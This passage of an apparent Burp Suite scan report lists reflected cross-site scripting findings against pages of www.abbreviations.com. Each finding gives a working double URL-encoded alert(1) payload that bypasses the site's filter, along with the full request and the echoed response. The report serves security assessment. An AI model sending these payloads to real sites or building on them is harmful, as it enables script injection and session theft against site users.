The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs2.aspx20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:33:43 GMT
Connection: close
Content-Length: 27292

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs2.aspx20e54</title><script>alert(1)</script>5cef4e545b4 stand for?</title>
...[SNIP]...

4.437. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d88af%2522%253balert%25281%2529%252f%252f9d70bb0239 was submitted in the REST URL parameter 1. This input was echoed as d88af";alert(1)//9d70bb0239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bs2.aspxd88af%2522%253balert%25281%2529%252f%252f9d70bb0239 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:14 GMT
Connection: close
Content-Length: 26683

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.438. http://www.abbreviations.com/bs2.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 41d8c</title><script>alert(1)</script>e632966bcd3 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=41d8c</title><script>alert(1)</script>e632966bcd3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:47 GMT
Connection: close
Content-Length: 26787

<title>What does 41D8C</TITLE><SCRIPT>ALERT(1)</SCRIPT>E632966BCD3 stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-rep
...[SNIP]...

4.439. http://www.abbreviations.com/bs2.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fa9"><script>alert(1)</script>04c67320817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=87fa9"><script>alert(1)</script>04c67320817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:19 GMT
Connection: close
Content-Length: 26593

<title>What does 87FA9"><SCRIPT>ALERT(1)</SCRIPT>04C67320817 stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;ov
...[SNIP]...
<meta name="keywords" content="What does 87fa9"><script>alert(1)</script>04c67320817 stand for?, What does 87fa9">
...[SNIP]...

4.440. http://www.abbreviations.com/bs2.aspx [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload a6ce2<script>alert(1)</script>eaf5fd2e670 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=a6ce2<script>alert(1)</script>eaf5fd2e670 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:21 GMT
Connection: close
Content-Length: 26523

<title>What does A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670 stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;over
...[SNIP]...
<span class="hdn">'A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670'</span>
...[SNIP]...

4.441. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 was submitted in the REST URL parameter 1. This input was echoed as ab542<script>alert(1)</script>78bee243156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /getsugg.aspxab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:55 GMT
Connection: close
Content-Length: 27203

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78bee243156";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>alert(1)</script>78bee243156" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>
...[SNIP]...

4.442. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc was submitted in the REST URL parameter 1. This input was echoed as c3ec8"><script>alert(1)</script>af1a48cd5fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /getsugg.aspxc3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:36:54 GMT
Connection: close
Content-Length: 27223

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does getsugg.aspxc3ec8"><script>alert(1)</script>af1a48cd5fc stand for?, What does getsugg.aspxc3ec8">
...[SNIP]...

4.443. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 was submitted in the REST URL parameter 1. This input was echoed as 173fe</title><script>alert(1)</script>df6bcc3c130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /getsugg.aspx173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:18 GMT
Connection: close
Content-Length: 27385

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does getsugg.aspx173fe</title><script>alert(1)</script>df6bcc3c130 stand for?</title>
...[SNIP]...

4.444. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 was submitted in the REST URL parameter 1. This input was echoed as 3f167";alert(1)//2f81dfde9c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /getsugg.aspx3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:24 GMT
Connection: close
Content-Length: 26852

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.h
...[SNIP]...

4.445. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc was submitted in the REST URL parameter 1. This input was echoed as 8287f<script>alert(1)</script>cc7e34a63cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /justadded.aspx8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:25 GMT
Connection: close
Content-Length: 27238

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>cc7e34a63cc";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>alert(1)</script>cc7e34a63cc" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>
...[SNIP]...

4.446. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d was submitted in the REST URL parameter 1. This input was echoed as 8db78";alert(1)//54c807c3c7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /justadded.aspx8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:05 GMT
Connection: close
Content-Length: 26906

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location
...[SNIP]...

4.447. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec was submitted in the REST URL parameter 1. This input was echoed as fff86</title><script>alert(1)</script>c6029eb64ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /justadded.aspxfff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:09 GMT
Connection: close
Content-Length: 27473

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does justadded.aspxfff86</title><script>alert(1)</script>c6029eb64ec stand for?</title>
...[SNIP]...

4.448. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 was submitted in the REST URL parameter 1. This input was echoed as 42381"><script>alert(1)</script>8c044cd5629 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /justadded.aspx42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:28 GMT
Connection: close
Content-Length: 27276

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does justadded.aspx42381"><script>alert(1)</script>8c044cd5629 stand for?, What does justadded.aspx42381">
...[SNIP]...

4.449. http://www.abbreviations.com/random.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d was submitted in the REST URL parameter 1. This input was echoed as 6714c"><script>alert(1)</script>6150d8cc99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /random.aspx6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:31 GMT
Connection: close
Content-Length: 27195

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does random.aspx6714c"><script>alert(1)</script>6150d8cc99d stand for?, What does random.aspx6714c">
...[SNIP]...

4.450. http://www.abbreviations.com/random.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b was submitted in the REST URL parameter 1. This input was echoed as 7bde3<script>alert(1)</script>480139ed9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /random.aspx7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:20 GMT
Connection: close
Content-Length: 27130

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>480139ed9b";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>alert(1)</script>480139ed9b" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>
...[SNIP]...

4.451. http://www.abbreviations.com/random.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abbreviations.com
Path:	/random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload a3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 was submitted in the REST URL parameter 1. This input was echoed as a3e63</title><script>alert(1)</script>029e9681aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

